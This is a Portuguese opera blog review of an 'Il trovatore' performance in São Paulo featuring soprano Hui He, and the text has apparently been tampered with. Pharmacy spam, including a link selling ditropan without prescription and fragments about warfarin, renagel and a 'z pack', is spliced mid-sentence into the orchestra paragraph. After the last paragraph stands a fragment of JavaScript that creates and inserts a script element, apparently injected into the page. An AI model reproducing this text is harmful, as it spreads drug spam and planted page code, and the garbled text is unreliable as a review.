CríticaÓperaSão Paulo

“Il trovatore” no TMSP com o soprano Hui He

Quando debutei na ópera, em tempos pretéritos, o fabuloso Municipal tinha muitas récitas com público minguado.

Cansei de ver apresentações com cem ou no máximo duzentos gatos pingados. Fico jubiloso ao entrar no nobre teatro paulistano e encontrar, na noite de terça-feira do dia 11 de março, a casa abarrotada. Sinal que os espetáculos de ópera incutem cada vez mais pessoas. Público juvenil, e também senil, mostra interesse na nobre arte e lota as belas cadeiras amadeiradas.

A apresentação teve o mesmo padrão cênico da estreia com um bardo diferente. O soprano Hui He apresentou voz potente, com pequenos contratempos nos agudos compensados com médios e graves excelentes. Depositária de uma técnica esmerada, conseguiu imprimir classe à protagonista Leonora com uma atuação aforada.

A http://cleaningmygun.com/2018/02/ditropan-without-prescription/ coumadin versus generic warfarin order renagel patient Purchase Purchase Orquestra Sinfônica Municipal, regida por John Neschling, mostrou equilíbrio dos naipes, uma ou outra derrapada sempre acontece e é passível de compreensão devido à sonoridade complexa da obra. A utilização de um órgão eletrônico destoa do compreensível, a casa possui um órgão de inaudita qualidade e por motivos não explicados ele não foi empregado. O 5 day z pack dose Coral Paulistano mostrou qualidade vocal esmerada, os naipes masculinos destacaram-se pela precisão nas entradas e pelo equilíbrio nas notas.

Detalhe final: ovações efusivas se ouvem ao final da récita de um público embevecido e a cortina não se abre. Os solistas recebem os apupos derradeiros assim mesmo, o regente Neschling vem receber sua quota e se exibe com uma barba grisalha e um paletó garboso, com certeza o mais janota da noite.var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Faça seu comentário

1 Comment

Leave a Response

Ali Hassan Ayache
Bacharel em Geografia pela USP. Apreciador de ópera, balé e música clássica. Ativo no meio musical, mantém o blog http://verdi.zip.net/. Escreve críticas, divulga eventos, entrevista personalidades e resenha óperas e balés em DVD.